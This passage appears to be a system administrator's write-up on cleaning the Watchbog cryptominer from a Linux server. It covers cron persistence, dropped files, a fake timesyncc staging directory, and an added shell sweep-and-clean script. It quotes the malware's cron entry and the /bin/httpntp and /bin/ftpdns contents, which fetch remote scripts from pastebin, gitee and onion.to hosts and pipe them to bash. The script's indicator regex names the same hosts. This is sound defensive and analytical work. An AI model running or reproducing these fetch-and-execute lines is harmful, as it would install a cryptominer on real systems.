
You don't know until you look, and what we found was alarming.

1) crontab -l

First, in the user crontab we found:

*/9 * * * * (curl -fsSL https://pastebin.com/raw/AgdgACUD||wget -q -O- https://pastebin.com/raw/AgdgACUD||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/uiZvwxG8").read()'||curl -fsSL https://gitee.com/return_block/party_1/raw/master/main/api/README.md||wget -q -O - https://gitee.com/return_block/party_1/raw/master/main/api/README.md||curl -fsSL https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt)|bash

2) /etc/cron.d

Several new files had appeared in this directory: apache, root and system (screenshot not reproduced here).

3) /etc/cron.deny

Nothing found.

4) /etc/cron.monthly

5) /etc/cron.daily

6) /etc/cron.hourly

(Screenshots for these three directories are not reproduced; the decoded script drops a file named Anacron into each of them, so that is what to look for.)

7) /etc/crontab

In /etc/crontab we also found two new, innocuously named commands: httpntp and ftpdns.

8) /etc/cron.weekly

Nothing found.

Finally, grep through all of these locations once more to be sure everything has been removed.

2.5 Delete the malicious commands

We also found the malicious commands /bin/httpntp, /bin/ftpdns and /usr/bin/watchbog.

I found these commands through the scheduled tasks.

httpntp:

[root@localhost ~]# vim /bin/httpntp 
(python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/uiZvwxG8").read()'||curl -fsSL https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt)|bash
##

ftpdns:

[root@localhost ~]# vim /bin/ftpdns 
(python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/uiZvwxG8").read()'||curl -fsSL https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt)|bash
##

watchbog is a binary: an ELF executable, so opening it in vim shows only the ELF header followed by binary garbage. Use file(1) to identify it instead, and record its sha256sum before deleting it so the hash can be shared as an indicator.

[root@localhost ~]# vim /usr/bin/watchbog
^?ELF^B^A^A^C^@^@^@^@^@^@^@^@^B^@>^@^A^@^@^@°?G^@^@^@^@^@@^@^@^@^@^@^@^@PM$^@^@^@^@^@^@^@^@^@@^@8^@
(remainder of the binary omitted)

2.6 Delete the timesyncc.service directory under /tmp

The decoded script stages its files in /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/ (config.json or config.txt, cpu.txt, pools.txt and the watchbog binary). Remove the whole directory. Be careful with the name: genuine systemd private directories are called systemd-private-...-systemd-timesyncd.service-... (timesyncd, with a d); the fake one says timesyncc. The script also leaves marker files in /tmp (.tmpc, .tmpza, .tmpnewasss, .tmpleve, .tmpnewzz) that drive its own re-run logic; remove those too. (Screenshot of the directory listing not reproduced.)

2.7 Kill the watchbog process

ps -ef|grep watchbog|grep -v grep|awk '{print $2}'|xargs kill -9

Chapter 3: Summary

For a mining process, my general approach is as follows.

In this order:

1) Check the scheduled tasks and find what the miner is actually executing.

2) Redirect every malicious hostname to localhost (127.0.0.1) in the hosts file.

3) Carefully audit every file and directory related to scheduled tasks, and clean them.

4) Delete the malicious commands and packages, and rename the system commands being abused.

5) Kill the malicious processes. Why last? Because even if you kill them first, the scheduled tasks simply start them again.

 

Supplement: the above is the general approach.

Alternatively, stop the crond service first, then work through the steps above one by one, and start crond again once everything checks out.
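The checks in 2.4 to 2.7 and the checklist above can be turned into a repeatable sweep. The following is an added example and not part of the original post: a POSIX shell script that scans every cron location (including the /var/spool/cron files the decoded script writes directly), reports cron files carrying the immutable attribute, looks for the dropped files and the fake systemd-private staging directory under /tmp, lists running watchbog processes, and, only when APPLY=1 is set, strips the indicator lines from the cron files after clearing the immutable bit. The ROOT argument is a path prefix so the same functions run against the live host (empty prefix), a mounted disk image or a test tree; the indicator regex is assembled from the strings in the cron entries and decoded script shown earlier. Stop crond before cleaning, as the supplement suggests, and delete outright the cron.d files (root, system, apache) and Anacron scripts the loader created rather than merely emptying them.

```shell
#!/bin/sh
# Added example (not from the original post): sweep and clean-up of the
# persistence the decoded Watchbog loader installs. ROOT is a path prefix
# ("" for the live host, or a mounted image / test directory).

# Strings taken from the cron entries and decoded script shown in the post
IOC_RE='pastebin\.com|ptpb\.pw|gitee\.com|onion\.to|pixeldra\.in|[|][ ]*bash|httpntp|ftpdns|watchbog'

# Everything cron(8)/anacron reads, plus the per-user spools the loader
# writes directly (crontab -l only shows the calling user's own entry)
cron_paths() {
  root="${1:-}"
  printf '%s\n' \
    "$root/etc/crontab" "$root/etc/cron.d" \
    "$root/etc/cron.hourly" "$root/etc/cron.daily" \
    "$root/etc/cron.weekly" "$root/etc/cron.monthly" \
    "$root/var/spool/cron" "$root/var/spool/cron/crontabs"
}

# file:line:text for every line matching IOC_RE in the cron locations
scan_cron() {
  root="${1:-}"
  cron_paths "$root" | while IFS= read -r p; do
    [ -e "$p" ] || continue
    if [ -d "$p" ]; then
      find "$p" -maxdepth 1 -type f -exec grep -HnE "$IOC_RE" {} + 2>/dev/null || true
    else
      grep -HnE "$IOC_RE" "$p" 2>/dev/null || true
    fi
  done
  return 0
}

# Number of indicator hits; 0 means the cron locations are clean
ioc_count() { scan_cron "${1:-}" | wc -l | tr -d ' '; }

# Cron files carrying the immutable attribute (the loader runs chattr -i
# on its own files before rewriting them; do the same before editing)
find_immutable() {
  root="${1:-}"
  command -v lsattr >/dev/null 2>&1 || return 0
  cron_paths "$root" | while IFS= read -r p; do
    [ -e "$p" ] || continue
    lsattr "$p" 2>/dev/null || true
  done | awk '$1 ~ /i/ { print $2 }'
  return 0
}

# Files and run-state markers the decoded script drops outside cron
dropper_paths() {
  root="${1:-}"
  printf '%s\n' \
    "$root/bin/httpntp" "$root/bin/ftpdns" "$root/bin/watchbog" \
    "$root/bin/config.json" "$root/bin/config.txt" \
    "$root/bin/cpu.txt" "$root/bin/pools.txt" \
    "$root/tmp/.tmpc" "$root/tmp/.tmpza" "$root/tmp/.tmpnewasss" \
    "$root/tmp/.tmpleve" "$root/tmp/.tmpnewzz" "$root/tmp/.tmpold"
}

# Dropped files that exist, plus the staging directory. Genuine systemd
# directories are named ...-systemd-timesyncd.service-... (with a d); the
# loader spells it "timesyncc", so match only that spelling.
find_droppers() {
  root="${1:-}"
  dropper_paths "$root" | while IFS= read -r p; do
    if [ -e "$p" ]; then printf '%s\n' "$p"; fi
  done
  find "$root/tmp" -maxdepth 1 -type d -name 'systemd-private-*timesyncc.service*' 2>/dev/null || true
  return 0
}

# Running miner processes; [w] keeps grep from matching itself
find_miner_procs() { ps -eo pid,user,args 2>/dev/null | grep -E '[w]atchbog' || true; }

# Strip indicator lines from the affected cron files. Dry run unless
# APPLY=1. Clears the immutable bit first and rewrites in place so owner
# and mode are kept. Delete the loader-created files afterwards.
purge_cron() {
  root="${1:-}"
  scan_cron "$root" | cut -d: -f1 | sort -u | while IFS= read -r f; do
    if [ "${APPLY:-0}" = "1" ]; then
      command -v chattr >/dev/null 2>&1 && chattr -i "$f" 2>/dev/null || true
      grep -vE "$IOC_RE" "$f" > "$f.clean" || true
      cat "$f.clean" > "$f" && rm -f "$f.clean"
      echo "cleaned $f"
    else
      echo "would clean $f"
    fi
  done
  return 0
}

sweep() {
  root="${1:-}"
  echo "== cron entries matching indicators =="; scan_cron "$root"
  echo "== immutable cron files (chattr -i before editing) =="; find_immutable "$root"
  echo "== dropped files and staging directory =="; find_droppers "$root"
  echo "== running miner processes =="; find_miner_procs
}

if [ "${1:-}" = "--sweep" ]; then sweep "${2:-}"; fi
```

`sh sweep.sh --sweep` reports on the live host; `purge_cron ""` prints what it would change, and `APPLY=1 purge_cron ""` makes the change. Run the process kill (2.7) only after `ioc_count` returns 0 and crond has been restarted with clean files, otherwise the next cron tick re-downloads the loader.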

